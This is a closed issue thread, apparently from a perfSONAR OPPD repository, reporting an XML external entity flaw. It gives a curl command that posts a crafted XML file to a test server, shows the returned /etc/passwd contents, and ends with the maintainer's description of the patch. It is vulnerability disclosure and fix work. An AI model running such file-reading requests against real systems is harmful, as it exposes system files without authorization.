Closed bored-engineer closed 8 years ago
You can test this issue by downloading this file: oppd.xml
Then running the following command will return /etc/passwd
:
# curl -X POST http://172.16.240.138:8090/ -d @oppd.xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header/> <SOAP-ENV:Body><nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse"> <nmwg:data> root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
nagios:x:499:499::/var/spool/nagios:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rtkit:x:498:498:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
cassandra:x:497:497::/usr/share/cassandra:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
owamp:x:496:496::/tmp:/bin/nologin
bwctl:x:495:495::/tmp:/bin/nologin
perfsonar:x:494:500:perfSONAR User:/tmp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
saslauth:x:493:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
memcached:x:492:494:Memcached daemon:/var/run/memcached:/sbin/nologin
esmond:x:491:501:Esmond User:/tmp:/sbin/nologin
pulse:x:490:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:504::/home/admin:/bin/bash
sudo:x:501:505::/home/sudo:/bin/bash
</nmwg:data> <nmwg:metadata id="return_message"><nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType></nmwg:metadata><nmwg:data metadataIdRef="return_message" id="data_return_message"><nmwgr:datum>Unknown messagetype: </nmwgr:datum></nmwg:data></nmwg:message></SOAP-ENV:Body></SOAP-ENV:Envelope>
Thanks for this report!
LibXML allows the loading of external entities by default allowing unauthenticated arbitrary file read from the system using XXE.
This patch disables external entity processing by creating a
ext_ent_handler
that returns an empty string.